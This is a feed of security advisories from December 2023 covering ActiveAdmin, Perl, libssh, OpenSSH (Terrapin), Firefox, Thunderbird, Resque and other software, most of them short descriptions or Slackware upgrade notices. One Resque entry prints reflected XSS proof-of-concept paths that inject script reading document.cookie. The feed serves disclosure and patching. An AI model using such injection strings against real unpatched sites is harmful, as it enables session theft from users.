16.12.2023 15:54:14	rubysec	[RUBYSEC:ACTIVEADMIN-2023-50448] Potential CSV export data leak (high)	### ImpactIn ActiveAdmin versions prior to 2.12.0, a concurrency issue wasfound that could allow a malicious actor to be able to accesspotentially private data that belongs to another user.The bug affects the functionality to export data as CSV files, andwas caused by a variable holding the collection to be exported beingshared across threads and not properly synchronized.The attacker would need access to the same ActiveAdmin applicationas the victim, and could exploit the issue by timing their requestimmediately before when they know someone else will request a CSV(e.g. via phishing) or request CSVs frequently and hope someoneelse makes a concurrent request.### PatchesVersions 2.12.0 and above fixed the problem by completelyremoving the shared state.	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:ACTIVEADMIN-2023-50448
18.12.2023 16:15:08	alpinelinux	[ALPINE:CVE-2023-47038] perl vulnerability	[From CVE-2023-47038] A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-47038
18.12.2023 02:00:00	gentoo	[GLSA-202312-01] Leptonica: Multiple Vulnerabilities (high)	Several vulnerabilities have been found in Leptonice, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-01
16.12.2023 19:35:07	composer	[PHP:ELIJAA-PHPMEMCACHEADMIN-2023-6027] PHPMemcachedAdmin vulnerable to cross-site scripting (XSS) via improper encoding		https://secdb.nttzen.cloud/security-advisory/detail/PHP:ELIJAA-PHPMEMCACHEADMIN-2023-6027
18.12.2023 17:49:59	rustsec	[RUSTSEC-2023-0074] Some Ref methods are unsound with some type parameters	The `Ref` methods `into_ref`, `into_mut`, `into_slice`, and `into_slice_mut` are unsoundand may allow safe code to exhibit undefined behavior when used with `Ref<B, T>` where `B`is [`cell::Ref`](https://doc.rust-lang.org/core/cell/struct.Ref.html) or[`cell::RefMut`](https://doc.rust-lang.org/core/cell/struct.RefMut.html). Note that thesemethods remain sound when used with `B` types other than `cell::Ref` or `cell::RefMut`.See https://github.com/google/zerocopy/issues/716 for a more in-depth analysis.The current plan is to yank the affected versions soon. Seehttps://github.com/google/zerocopy/issues/679 for more detail.	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0074
19.12.2023 23:32:36	slackware	[SSA:2023-353-03] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.thunderbird.net/en-US/thunderbird/115.6.0/releasenotes/ https://www.mozilla.org/en-US/security/advisories/mfsa2023-55/ https://www.cve.org/CVERecord?id=CVE-2023-50762 https://www.cve.org/CVERecord?id=CVE-2023-50761 https://www.cve.org/CVERecord?id=CVE-2023-6856 https://www.cve.org/CVERecord?id=CVE-2023-6857 https://www.cve.org/CVERecord?id=CVE-2023-6858 https://www.cve.org/CVERecord?id=CVE-2023-6859 https://www.cve.org/CVERecord?id=CVE-2023-6860 https://www.cve.org/CVERecord?id=CVE-2023-6861 https://www.cve.org/CVERecord?id=CVE-2023-6862 https://www.cve.org/CVERecord?id=CVE-2023-6863 https://www.cve.org/CVERecord?id=CVE-2023-6864 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.6.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.6.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.6.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.6.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:0e49abb4aeaaf1aa1c351490359edfca mozilla-thunderbird-115.6.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:4a5b24e971a60a2ed003969e43dccab5 mozilla-thunderbird-115.6.0-x86_64-1_slack15.0.txzSlackware -current package:809a9b3bbc20e55fc620281320cd5d40 xap/mozilla-thunderbird-115.6.0-i686-1.txzSlackware x86_64 -current package:89ed5bc481d539a621633e541b6e384d xap/mozilla-thunderbird-115.6.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-03
19.12.2023 23:32:19	slackware	[SSA:2023-353-02] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.6.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2023-54/ https://www.cve.org/CVERecord?id=CVE-2023-6856 https://www.cve.org/CVERecord?id=CVE-2023-6865 https://www.cve.org/CVERecord?id=CVE-2023-6857 https://www.cve.org/CVERecord?id=CVE-2023-6858 https://www.cve.org/CVERecord?id=CVE-2023-6859 https://www.cve.org/CVERecord?id=CVE-2023-6860 https://www.cve.org/CVERecord?id=CVE-2023-6867 https://www.cve.org/CVERecord?id=CVE-2023-6861 https://www.cve.org/CVERecord?id=CVE-2023-6862 https://www.cve.org/CVERecord?id=CVE-2023-6863 https://www.cve.org/CVERecord?id=CVE-2023-6864 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.6.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.6.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.6.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.6.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:b2ac40b678fed2f2bc37fbaa8dcd9766 mozilla-firefox-115.6.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:fabd52a287faddb7543b2cce8d3faa1f mozilla-firefox-115.6.0esr-x86_64-1_slack15.0.txzSlackware -current package:75cae7b411df6f4ca4f4c8f18529b772 xap/mozilla-firefox-115.6.0esr-i686-1.txzSlackware x86_64 -current package:9388bad634352c43749aa19061157c38 xap/mozilla-firefox-115.6.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-02
19.12.2023 23:31:02	slackware	[SSA:2023-353-01] libssh	New libssh packages are available for Slackware 14.2, 15.0, and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libssh-0.10.6-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Command injection using proxycommand. Potential downgrade attack using strict kex. Missing checks for return values of MD functions. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-6004 https://www.cve.org/CVERecord?id=CVE-2023-48795 https://www.cve.org/CVERecord?id=CVE-2023-6918 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 14.2:ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libssh-0.10.6-i586-1_slack14.2.txzUpdated package for Slackware x86_64 14.2:ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libssh-0.10.6-x86_64-1_slack14.2.txzUpdated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libssh-0.10.6-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libssh-0.10.6-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libssh-0.10.6-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libssh-0.10.6-x86_64-1.txzMD5 signaturesSlackware 14.2 package:df594d833d2b61430550c4a6249e8e16 libssh-0.10.6-i586-1_slack14.2.txzSlackware x86_64 14.2 package:697e225933eb11593ee2db6dca0d38a8 libssh-0.10.6-x86_64-1_slack14.2.txzSlackware 15.0 package:122816350a43ac336e1f48fcf3c0b2aa libssh-0.10.6-i586-1_slack15.0.txzSlackware x86_64 15.0 package:09688c662806fcfbc8b7f2b3bf408674 libssh-0.10.6-x86_64-1_slack15.0.txzSlackware -current package:c3a0ff73b4a2d523f99a5e06b4b8df75 l/libssh-0.10.6-i586-1.txzSlackware x86_64 -current package:01fba0c880daaf7536dcf31cc5553708 l/libssh-0.10.6-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libssh-0.10.6-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-01
19.12.2023 15:08:22	ubuntu	[USN-6561-1] libssh vulnerability	A security issue was fixed in libssh.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6561-1
19.12.2023 15:02:10	ubuntu	[USN-6560-1] OpenSSH vulnerabilities	Several security issues were fixed in OpenSSH.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6560-1
19.12.2023 02:15:08	alpinelinux	[ALPINE:CVE-2023-6918] libssh vulnerability	[From CVE-2023-6918] A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-6918
19.12.2023 02:00:00	mozilla	[MFSA-2023-54] Security Vulnerabilities fixed in Firefox ESR 115.6 (high)	- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)The WebGL <code>DrawElementsInstanced</code> method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)When resolving a symlink, a race may occur where the buffer passed to <code>readlink</code> may actually be smaller than necessary. <br>This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)Firefox was susceptible to a heap buffer overflow in <code>nsTextFragment</code> due to insufficient OOM handling.- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)A use-after-free condition affected TLS socket creation when under memory pressure.- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)The <code>VideoBridge</code> allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)The <code>nsWindow::PickerOpen(void)</code> method was susceptible to a heap buffer overflow when running in headless mode.- CVE-2023-6862: Use-after-free in nsDNSService (moderate)A use-after-free was identified in the <code>nsDNSService::Init</code>. This issue appears to manifest rarely during start-up.- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)The <code>ShutdownObserver()</code> was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2023-6865: Potential exposure of uninitialized data in EncryptingOutputStream (high)<code>EncryptingOutputStream</code> was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode.- CVE-2023-6867: Clickjacking permission prompts using the popup transition (moderate)The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-54
19.12.2023 02:00:00	mozilla	[MFSA-2023-55] Security Vulnerabilities fixed in Thunderbird 115.6 (high)	- CVE-2023-50761: S/MIME signature accepted despite mismatching message date (high)The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time.- CVE-2023-50762: Truncated signed text was shown with a valid OpenPGP signature (high)When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message.- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)The WebGL <code>DrawElementsInstanced</code> method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)When resolving a symlink, a race may occur where the buffer passed to <code>readlink</code> may actually be smaller than necessary. <br>This bug only affects Thunderbird on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)Thunderbird was susceptible to a heap buffer overflow in <code>nsTextFragment</code> due to insufficient OOM handling.- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)A use-after-free condition affected TLS socket creation when under memory pressure.- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)The <code>VideoBridge</code> allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)The <code>nsWindow::PickerOpen(void)</code> method was susceptible to a heap buffer overflow when running in headless mode.- CVE-2023-6862: Use-after-free in nsDNSService (moderate)A use-after-free was identified in the <code>nsDNSService::Init</code>. This issue appears to manifest rarely during start-up.- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)The <code>ShutdownObserver()</code> was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-55
19.12.2023 02:00:00	mozilla	[MFSA-2023-56] Security Vulnerabilities fixed in Firefox 121 (high)	- CVE-2023-6135: NSS susceptible to "Minerva" attack (high)Multiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key.- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)The WebGL <code>DrawElementsInstanced</code> method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)When resolving a symlink, a race may occur where the buffer passed to <code>readlink</code> may actually be smaller than necessary. <br>This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)Firefox was susceptible to a heap buffer overflow in <code>nsTextFragment</code> due to insufficient OOM handling.- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)A use-after-free condition affected TLS socket creation when under memory pressure.- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)The <code>VideoBridge</code> allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)The <code>nsWindow::PickerOpen(void)</code> method was susceptible to a heap buffer overflow when running in headless mode.- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)The <code>ShutdownObserver()</code> was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2023-6865: Potential exposure of uninitialized data in EncryptingOutputStream (high)<code>EncryptingOutputStream</code> was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode.- CVE-2023-6866: TypedArrays lack sufficient exception handling (moderate)TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed.- CVE-2023-6867: Clickjacking permission prompts using the popup transition (moderate)The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.- CVE-2023-6868: WebPush requests on Firefox for Android did not require VAPID key (moderate)In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties.<br>This bug only affects Firefox on Android.- CVE-2023-6869: Content can paint outside of sandboxed iframe (low)A <code><dialog></code> element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content.- CVE-2023-6870: Android Toast notifications may obscure fullscreen event notifications (low)Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. <br>This issue only affects Android versions of Firefox and Firefox Focus.- CVE-2023-6871: Lack of protocol handler warning in some instances (low)Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler.- CVE-2023-6872: Browsing history leaked to syslogs via GNOME (low)Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab.- CVE-2023-6873: Memory safety bugs fixed in Firefox 121 (high)Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-56
18.12.2023 19:04:19	suse	[SUSE-SU-2023:4895-1] Security update for libsass (moderate)	Security update for libsass	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4895-1
18.12.2023 18:15:10	alpinelinux	[ALPINE:CVE-2023-48795] openssh, libssh, py3-paramiko, erlang, dropbear, putty vulnerability	[From CVE-2023-48795] The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD 1.3.9rc1, ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-48795
19.12.2023 16:16:37	rubysec	[RUBYSEC:RESQUE-2023-50724] Resque vulnerable to Reflected Cross Site Scripting through pathnames (medium)	### Impactresque-web in resque versions before 2.1.0 is vulnerable to reflectedXSS through the current_queue parameter in the path of the queues endpoint.### Patchesv2.1.0### WorkaroundsNo known workarounds at this time. It is recommended to not clickon 3rd party or untrusted links to the resque-web interface untilyou have patched your application.### Referenceshttps://github.com/resque/resque/issues/1679https://github.com/resque/resque/pull/1687	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50724
19.12.2023 16:16:37	rubysec	[RUBYSEC:RESQUE-2023-50725] Resque vulnerable to reflected XSS in resque-web failed and queues lists (medium)	### ImpactThe following paths in resque-web have been found to bevulnerable to reflected XSS:```/failed/?class=<script>alert(document.cookie)</script>/queues/><img src=a onerror=alert(document.cookie)>```### Patchesv2.2.1### WorkaroundsNo known workarounds at this time. It is recommended to not clickon 3rd party or untrusted links to the resque-web interface untilyou have patched your application.### Referenceshttps://github.com/resque/resque/pull/1790	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50725
19.12.2023 16:16:37	rubysec	[RUBYSEC:RESQUE-2023-50727] Resque vulnerable to reflected XSS in Queue Endpoint (medium)	### ImpactReflected XSS can be performed using the current_queue portion ofthe path on the /queues endpoint of resque-web.### Patchesv2.6.0### WorkaroundsNo known workarounds at this time. It is recommended to not clickon 3rd party or untrusted links to the resque-web interface untilyou have patched your application.### Referenceshttps://github.com/resque/resque/pull/1865	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50727
19.12.2023 16:16:37	rubysec	[RUBYSEC:RESQUE-SCHEDULER-2022-44303] Resque Scheduler Reflected XSS In Delayed Jobs View (medium)	### ImpactResque Scheduler version 1.27.4 and above are affected by a cross-sitescripting vulnerability. A remote attacker can inject javascript codeto the "{schedule_job}" or "args" parameter in/resque/delayed/jobs/{schedule_job}?args={args_id} to execute javascript at client side.### PatchesFixed in v4.10.2### WorkaroundsNo known workarounds at this time. It is recommended to not click on3rd party or untrusted links to the resque-web interface until youhave patched your application.### References* https://nvd.nist.gov/vuln/detail/CVE-2022-44303* https://github.com/resque/resque-scheduler/issues/761* https://github.com/resque/resque/issues/1885* https://github.com/resque/resque-scheduler/pull/780* https://github.com/resque/resque-scheduler/pull/783	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-SCHEDULER-2022-44303
20.12.2023 23:14:12	slackware	[SSA:2023-354-01] proftpd	New proftpd packages are available for Slackware 14.0, 14.1, 14.2, 15.0,and -current to fix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/proftpd-1.3.8b-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: mod_sftp: implemented mitigations for "Terrapin" SSH attack. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-48795 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 14.0:ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.8b-i486-1_slack14.0.txzUpdated package for Slackware x86_64 14.0:ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.0.txzUpdated package for Slackware 14.1:ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.8b-i486-1_slack14.1.txzUpdated package for Slackware x86_64 14.1:ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.1.txzUpdated package for Slackware 14.2:ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/proftpd-1.3.8b-i586-1_slack14.2.txzUpdated package for Slackware x86_64 14.2:ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.2.txzUpdated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/proftpd-1.3.8b-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/proftpd-1.3.8b-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.8b-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.8b-x86_64-1.txzMD5 signaturesSlackware 14.0 package:79ebaf263d088d62cf7b0897e3908e79 proftpd-1.3.8b-i486-1_slack14.0.txzSlackware x86_64 14.0 package:c0e6a80bc274087fe9f738bd52c4ae5b proftpd-1.3.8b-x86_64-1_slack14.0.txzSlackware 14.1 package:0622b22327bf55b71a5f136eafbbffbd proftpd-1.3.8b-i486-1_slack14.1.txzSlackware x86_64 14.1 package:718ea14965856be15d8dad5d730e28fd proftpd-1.3.8b-x86_64-1_slack14.1.txzSlackware 14.2 package:af54155ff2e9a9d5cb2caefb24f5fb95 proftpd-1.3.8b-i586-1_slack14.2.txzSlackware x86_64 14.2 package:192ced161307e17ad8e693408488d88e proftpd-1.3.8b-x86_64-1_slack14.2.txzSlackware 15.0 package:d459babbab7447215e65577a847b0eeb proftpd-1.3.8b-i586-1_slack15.0.txzSlackware x86_64 15.0 package:603638e2b7ca0db3f4463a73525ee2a5 proftpd-1.3.8b-x86_64-1_slack15.0.txzSlackware -current package:9bf202802b1fdf70e3cdeff86a89ef09 n/proftpd-1.3.8b-i586-1.txzSlackware x86_64 -current package:dfbbc5d28742b30770b35a36db8e2763 n/proftpd-1.3.8b-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg proftpd-1.3.8b-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-354-01
20.12.2023 02:00:00	gentoo	[GLSA-202312-02] Minecraft Server: Remote Code Execution (high)	A vulnerability has been found in Minecraft Server which leads to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-02
20.12.2023 02:00:00	gentoo	[GLSA-202312-03] Mozilla Thunderbird: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-03
21.12.2023 00:33:59	rustsec	[RUSTSEC-2023-0075] Unaligned write of u64 on 32-bit and 16-bit platforms	Affected versions allocate memory using the alignment of `usize` and write datato it of type `u64`, without using `core::ptr::write_unaligned`. In platformswith sub-64bit alignment for `usize` (including wasm32 and x86) these writesare insufficiently aligned some of the time.If using an ordinary optimized standard library, the bug exhibits UndefinedBehavior so may or may not behave in any sensible way, depending onoptimization settings and hardware and other things. If using a Rust standardlibrary built with debug assertions enabled, the bug manifests deterministicallyin a crash (non-unwinding panic) saying _"ptr::write requires that the pointerargument is aligned and non-null"_.No 64-bit platform is impacted by the bug.The flaw was corrected by allocating with adequately high alignment on allplatforms.	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0075
20.12.2023 14:50:26	almalinux	[ALSA-2023:7876] opensc security update (moderate)	opensc security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7876
20.12.2023 14:42:21	almalinux	[ALSA-2023:7877] openssl security update (low)	openssl security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7877
21.12.2023 20:16:53	msrc	[MS:CVE-2023-7024] Chromium: CVE-2023-7024 Heap buffer overflow in WebRTC		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-7024
22.12.2023 02:00:00	gentoo	[GLSA-202312-04] Arduino: Remote Code Execution (normal)	A vulnerability has been found in Arduino which bundled a vulnerable version of log4j.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-04
22.12.2023 02:00:00	gentoo	[GLSA-202312-05] libssh: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-05
22.12.2023 02:00:00	gentoo	[GLSA-202312-06] Exiv2: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-06
22.12.2023 02:00:00	gentoo	[GLSA-202312-07] QtWebEngine: Multiple Vulnerabilities (high)	Multiple vulnerabilitiies have been discovered in QtWebEngine, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-07
